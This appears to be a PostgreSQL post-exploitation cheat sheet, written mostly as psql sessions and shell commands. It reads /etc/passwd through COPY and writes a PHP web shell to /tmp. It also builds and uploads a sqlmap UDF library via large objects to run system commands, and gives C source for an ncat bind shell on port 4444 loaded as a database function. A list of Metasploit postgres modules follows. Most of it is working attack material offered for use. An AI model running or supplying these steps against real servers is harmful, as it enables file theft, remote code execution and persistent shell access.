----<br/>
<br/>
###LIST DATABASES###<br/>
<br/>
```<br/>
postgres=# \l<br/>
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; List of databases<br/>
&nbsp; &nbsp;Name &nbsp; &nbsp;| &nbsp;Owner &nbsp; | Encoding | &nbsp; Collate &nbsp; | &nbsp; &nbsp;Ctype &nbsp; &nbsp;| &nbsp; Access privileges &nbsp; <br/>
-----------+----------+----------+-------------+-------------+-----------------------<br/>
&nbsp;msfdb &nbsp; &nbsp; | msfuser &nbsp;| UTF8 &nbsp; &nbsp; | en_US.UTF-8 | en_US.UTF-8 |<br/>
&nbsp;postgres &nbsp;| postgres | UTF8 &nbsp; &nbsp; | en_US.UTF-8 | en_US.UTF-8 |<br/>
&nbsp;template0 | postgres | UTF8 &nbsp; &nbsp; | en_US.UTF-8 | en_US.UTF-8 | =c/postgres &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;+<br/>
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;| &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;| &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;| &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; | &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; | postgres=CTc/postgres<br/>
&nbsp;template1 | postgres | UTF8 &nbsp; &nbsp; | en_US.UTF-8 | en_US.UTF-8 | =c/postgres &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;+<br/>
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;| &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;| &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;| &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; | &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; | postgres=CTc/postgres<br/>
(4 rows)<br/>
<br/>
```<br/>
<br/>
----<br/>
<br/>
###LIST DATABASE USERS###<br/>
<br/>
```<br/>
postgres=# \du<br/>
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;List of roles<br/>
&nbsp;Role name | &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; Attributes &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; | Member of<br/>
-----------+------------------------------------------------+-----------<br/>
&nbsp;msfuser &nbsp; | &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;| {}<br/>
&nbsp;postgres &nbsp;| Superuser, Create role, Create DB, Replication | {}<br/>
<br/>
```<br/>
<br/>
Please try more details about postgresql database.<br/>
<br/>
<br/>
----<br/>
<br/>
##LIST DIRECTORY##<br/>
<br/>
```<br/>
postgres=# select pg_ls_dir('/etc');<br/>
ERROR: &nbsp;absolute path not allowed<br/>
postgres=# select pg_ls_dir('./');<br/>
&nbsp; &nbsp; &nbsp; pg_ls_dir &nbsp; &nbsp; &nbsp; <br/>
----------------------<br/>
&nbsp;postmaster.opts<br/>
&nbsp;postmaster.pid<br/>
&nbsp;pg_logical<br/>
&nbsp;pg_clog<br/>
&nbsp;postgresql.auto.conf<br/>
&nbsp;pg_hba.conf<br/>
&nbsp;cmd.so<br/>
&nbsp;pg_multixact<br/>
&nbsp;postgresql.conf<br/>
&nbsp;pg_ident.conf<br/>
&nbsp;global<br/>
&nbsp;pg_stat_tmp<br/>
&nbsp;PG_VERSION<br/>
&nbsp;pg_dynshmem<br/>
&nbsp;pg_twophase<br/>
&nbsp;pg_xlog<br/>
&nbsp;pg_notify<br/>
&nbsp;pg_snapshots<br/>
&nbsp;pg_tblspc<br/>
&nbsp;pg_serial<br/>
&nbsp;pg_stat<br/>
&nbsp;base<br/>
&nbsp;pg_subtrans<br/>
&nbsp;pg_replslot<br/>
(24 rows)<br/>
<br/>
```<br/>
<br/>
----<br/>
<br/>
##READ FILE##<br/>
<br/>
**method1**<br/>
<br/>
```<br/>
postgres=# select pg_read_file('postgresql.conf', 0, 200);<br/>
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; pg_read_file &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;<br/>
--------------------------------------------<br/>
&nbsp;# ----------------------------- &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; +<br/>
&nbsp;# PostgreSQL configuration file &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; +<br/>
&nbsp;# ----------------------------- &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; +<br/>
&nbsp;# &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; +<br/>
&nbsp;# This file consists of lines of the form:+<br/>
&nbsp;# &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; +<br/>
&nbsp;# &nbsp; name = value &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;+<br/>
&nbsp;# &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; +<br/>
&nbsp;# (The "=" is optional.) &nbsp;Whitespace m<br/>
(1 row)<br/>
<br/>
```<br/>
<br/>
**method2**<br/>
<br/>
```<br/>
postgres=# drop table pwn;<br/>
ERROR: &nbsp;table "pwn" does not exist<br/>
postgres=# CREATE TABLE pwn(t TEXT);<br/>
CREATE TABLE<br/>
postgres=# COPY pwn FROM '/etc/passwd';<br/>
COPY 27<br/>
postgres=# SELECT * FROM pwn limit 1 offset 0;<br/>
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; t &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;<br/>
---------------------------------<br/>
&nbsp;root:x:0:0:root:/root:/bin/bash<br/>
(1 row)<br/>
<br/>
postgres=# SELECT * FROM pwn;<br/>
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; t &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; <br/>
------------------------------------------------------------------------------<br/>
&nbsp;root:x:0:0:root:/root:/bin/bash<br/>
&nbsp;bin:x:1:1:bin:/bin:/usr/bin/nologin<br/>
&nbsp;daemon:x:2:2:daemon:/:/usr/bin/nologin<br/>
&nbsp;mail:x:8:12:mail:/var/spool/mail:/usr/bin/nologin<br/>
&nbsp;ftp:x:14:11:ftp:/srv/ftp:/usr/bin/nologin<br/>
&nbsp;http:x:33:33:http:/srv/http:/usr/bin/nologin<br/>
&nbsp;uuidd:x:68:68:uuidd:/:/usr/bin/nologin<br/>
&nbsp;dbus:x:81:81:dbus:/:/usr/bin/nologin<br/>
&nbsp;nobody:x:99:99:nobody:/:/usr/bin/nologin<br/>
&nbsp;systemd-journal-gateway:x:191:191:systemd-journal-gateway:/:/usr/bin/nologin<br/>
&nbsp;systemd-timesync:x:192:192:systemd-timesync:/:/usr/bin/nologin<br/>
&nbsp;systemd-network:x:193:193:systemd-network:/:/usr/bin/nologin<br/>
&nbsp;systemd-bus-proxy:x:194:194:systemd-bus-proxy:/:/usr/bin/nologin<br/>
&nbsp;systemd-resolve:x:195:195:systemd-resolve:/:/usr/bin/nologin<br/>
&nbsp;systemd-journal-remote:x:999:999:systemd Journal Remote:/:/sbin/nologin<br/>
&nbsp;systemd-journal-upload:x:998:998:systemd Journal Upload:/:/sbin/nologin<br/>
&nbsp;avahi:x:84:84:avahi:/:/bin/false<br/>
&nbsp;polkitd:x:102:102:Policy Kit Daemon:/:/bin/false<br/>
&nbsp;git:x:997:997:git daemon user:/:/bin/bash<br/>
&nbsp;colord:x:124:124::/var/lib/colord:/bin/false<br/>
&nbsp;postgres:x:88:88:PostgreSQL user:/var/lib/postgres:/bin/bash<br/>
&nbsp;lab:x:1000:1000::/home/notfound:/bin/bash<br/>
&nbsp;stunnel:x:16:16::/var/run/stunnel:/bin/false<br/>
&nbsp;dnsmasq:x:996:996:dnsmasq daemon:/:/usr/bin/nologin<br/>
&nbsp;mongodb:x:995:2::/var/lib/mongodb:/bin/bash<br/>
&nbsp;mysql:x:89:89::/var/lib/mysql:/bin/false<br/>
&nbsp;sslh:x:994:994::/:/sbin/nologin<br/>
(27 rows)<br/>
<br/>
postgres=# DROP table pwn;<br/>
<br/>
```<br/>
----<br/>
<br/>
##WRITE FILE##<br/>
<br/>
```<br/>
postgres=# DROP TABLE pwn;<br/>
DROP TABLE<br/>
postgres=# CREATE TABLE pwn (t TEXT);<br/>
CREATE TABLE<br/>
postgres=# INSERT INTO pwn(t) VALUES ('&lt;?php @system("$_GET[cmd]");?&gt;');<br/>
INSERT 0 1<br/>
postgres=# SELECT * FROM pwn;<br/>
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;t &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;<br/>
--------------------------------<br/>
&nbsp;&lt;?php @system("$_GET[cmd]");?&gt;<br/>
(1 row)<br/>
<br/>
postgres=# COPY pwn(t) TO '/tmp/cmd.php';<br/>
COPY 1<br/>
postgres=# DROP TABLE pwn;<br/>
DROP TABLE<br/>
```<br/>
<br/>
<br/>
----<br/>
<br/>
##UDF HACK##<br/>
<br/>
<br/>
###COMPILE SOURCE###<br/>
<br/>
```<br/>
lab: / $ git clone https://github.com/sqlmapproject/udfhack/<br/>
```<br/>
<br/>
```<br/>
lab: / $ gcc lib_postgresqludf_sys.c -I`pg_config --includedir-server` -fPIC -shared -o udf64.so<br/>
lab: / $ gcc -Wall -I/usr/include/postgresql/server -Os -shared lib_postgresqludf_sys.c -fPIC -o lib_postgresqludf_sys.so<br/>
lab: / $ strip -sx lib_postgresqludf_sys.so<br/>
```<br/>
<br/>
###COMMAND EXECUTION###<br/>
<br/>
transfrom udf.so to hex strings.<br/>
<br/>
```<br/>
lab:~/ $ cat udf.so | hex<br/>
```<br/>
<br/>
upload udf.so with databse features.<br/>
<br/>
```<br/>
postgres=# INSERT INTO pg_largeobject (loid, pageno, data) VALUES (19074, 0, decode('079c...', 'hex'));<br/>
INSERT 0 1<br/>
<br/>
<br/>
postgres=# SELECT lo_export(19074, 'cmd.so');<br/>
ERROR: &nbsp;pg_largeobject entry for OID 19074, page 0 has invalid data field size 3213<br/>
postgres=# SELECT setting FROM pg_settings WHERE name='data_directory';<br/>
&nbsp; &nbsp; &nbsp; &nbsp; setting &nbsp; &nbsp; &nbsp; &nbsp; <br/>
------------------------<br/>
&nbsp;/var/lib/postgres/data<br/>
(1 row)<br/>
```<br/>
<br/>
Library is too large, and we need to split it to some pieces. &nbsp;Please read https://github.com/sqlmapproject/sqlmap/issues/1170.<br/>
<br/>
```<br/>
postgres=# select * from pg_largeobject;<br/>
&nbsp;loid | pageno | data<br/>
------+--------+------<br/>
(0 rows)<br/>
<br/>
postgres=# SELECT setting FROM pg_settings WHERE name='data_directory';<br/>
&nbsp; &nbsp; &nbsp; &nbsp; setting &nbsp; &nbsp; &nbsp; &nbsp; <br/>
------------------------<br/>
&nbsp;/var/lib/postgres/data<br/>
(1 row)<br/>
<br/>
postgres=# SELECT lo_creat(-1);<br/>
&nbsp;lo_creat<br/>
----------<br/>
&nbsp; &nbsp; 19075<br/>
(1 row)<br/>
<br/>
postgres=# SELECT lo_create(11122);<br/>
&nbsp;lo_create<br/>
-----------<br/>
&nbsp; &nbsp; &nbsp;11122<br/>
(1 row)<br/>
<br/>
postgres=# select * from pg_largeobject;<br/>
&nbsp;loid | pageno | data<br/>
------+--------+------<br/>
(0 rows)<br/>
<br/>
postgres=# INSERT INTO pg_largeobject VALUES (11122, 0, decode('079c...', 'hex'));<br/>
INSERT 0 1<br/>
postgres=# INSERT INTO pg_largeobject VALUES (11122, 1, decode('a28e...', 'hex'));<br/>
INSERT 0 1<br/>
postgres=# INSERT INTO pg_largeobject VALUES (11122, 2, decode('1265...', 'hex'));<br/>
INSERT 0 1<br/>
postgres=# INSERT INTO pg_largeobject VALUES (11122, 3, decode('c62e...', 'hex'));<br/>
INSERT 0 1<br/>
postgres=# SELECT lo_export(11122, '/tmp/cmd.so');<br/>
&nbsp;lo_export<br/>
-----------<br/>
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp;1<br/>
(1 row)<br/>
<br/>
postgres=# SELECT lo_unlink(11122);<br/>
&nbsp;lo_unlink<br/>
-----------<br/>
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp;1<br/>
(1 row)<br/>
<br/>
```<br/>
upload library successfully, and then create Postgresql FUNCTION.<br/>
<br/>
```<br/>
postgres=# CREATE OR REPLACE FUNCTION sys_exec(text) RETURNS int4 AS '/tmp/udf64.so', 'sys_exec' LANGUAGE C RETURNS NULL ON NULL INPUT IMMUTABLE;<br/>
CREATE FUNCTION<br/>
postgres=# CREATE OR REPLACE FUNCTION sys_eval(text) RETURNS text AS '/tmp/udf64.so', 'sys_eval' LANGUAGE C RETURNS NULL ON NULL INPUT IMMUTABLE;<br/>
CREATE FUNCTION<br/>
```<br/>
<br/>
Execute commands with **sys\_exec**, and nothing returns.<br/>
<br/>
```<br/>
postgres=# SELECT sys_exec('id');<br/>
&nbsp;sys_exec<br/>
----------<br/>
&nbsp; &nbsp; &nbsp; &nbsp; 0<br/>
(1 row)<br/>
```<br/>
<br/>
Please clear functions after commands execution.<br/>
<br/>
```<br/>
postgres=# DROP FUNCTION sys_exec(text);<br/>
DROP FUNCTION<br/>
postgres=# DROP FUNCTION sys_eval(text);<br/>
DROP FUNCTION<br/>
<br/>
```<br/>
<br/>
###BIND SHELL###<br/>
<br/>
```<br/>
// bind shell on port 4444<br/>
#include "postgres.h"<br/>
#include "fmgr.h"<br/>
#include &lt;stdlib.h&gt;<br/>
<br/>
#ifdef PG_MODULE_MAGIC<br/>
PG_MODULE_MAGIC;<br/>
#endif<br/>
<br/>
text *exec()<br/>
{<br/>
&nbsp; &nbsp; system("ncat -e /bin/bash -l -p 4444");<br/>
}<br/>
<br/>
```<br/>
compile source code,<br/>
<br/>
```<br/>
lab:postgres_cmd/ $ &nbsp;vim nc.c<br/>
lab:postgres_cmd/ $ &nbsp;gcc nc.c -I`pg_config --includedir-server` -fPIC -shared -o nc.so<br/>
lab:postgres_cmd/ $ &nbsp;strip -sx nc.so<br/>
```<br/>
<br/>
copy nc.so to postgresql tmp path, or you can upload so file with database features.<br/>
<br/>
```<br/>
lab:postgres_cmd/ $ &nbsp;sudo cp nc.so /tmp/systemd-private-374c1bd49d5f425ca21cca8cc6d89de7-postgresql.service-SKrVjI/tmp/nc.so<br/>
```<br/>
<br/>
create FUNCTION exec for bind shell. And client connects to target.<br/>
<br/>
```<br/>
postgres=# CREATE OR REPLACE FUNCTION exec() RETURNS text AS &nbsp;'/tmp/nc.so', 'exec' LANGUAGE C STRICT;<br/>
CREATE FUNCTION<br/>
postgres=# SELECT exec();<br/>
server closed the connection unexpectedly<br/>
&nbsp; &nbsp; This probably means the server terminated abnormally<br/>
&nbsp; &nbsp; before or while processing the request.<br/>
The connection to the server was lost. Attempting reset: Failed.<br/>
<br/>
```<br/>
<br/>
----<br/>
<br/>
<br/>
##METASPLOIT POSTGRESQL MODULES##<br/>
<br/>
```<br/>
use auxiliary/admin/postgres/postgres_readfile<br/>
use auxiliary/admin/postgres/postgres_sql<br/>
use auxiliary/scanner/postgres/postgres_dbname_flag_injection<br/>
use auxiliary/scanner/postgres/postgres_login<br/>
use auxiliary/scanner/postgres/postgres_version<br/>
use auxiliary/server/capture/postgresql<br/>
use exploit/linux/postgres/postgres_payload<br/>
use exploit/windows/postgres/postgres_payload<br/>
```<br/>
<br/>
<br/>
<br/>
#REFERENCES#<br/>
<br/>
https://github.com/sqlmapproject/udfhack/ &nbsp;<br/>
https://github.com/sqlmapproject/sqlmap/issues/1170 &nbsp; <br/>
http://zone.wooyun.org/content/4971 &nbsp;<br/>
http://drops.wooyun.org/tips/6449 &nbsp;<br/>
http://bernardodamele.blogspot.com/2009/01/command-execution-with-postgresql-udf.html &nbsp;<br/>
<br/>
<br/>
<br/>
</body></html>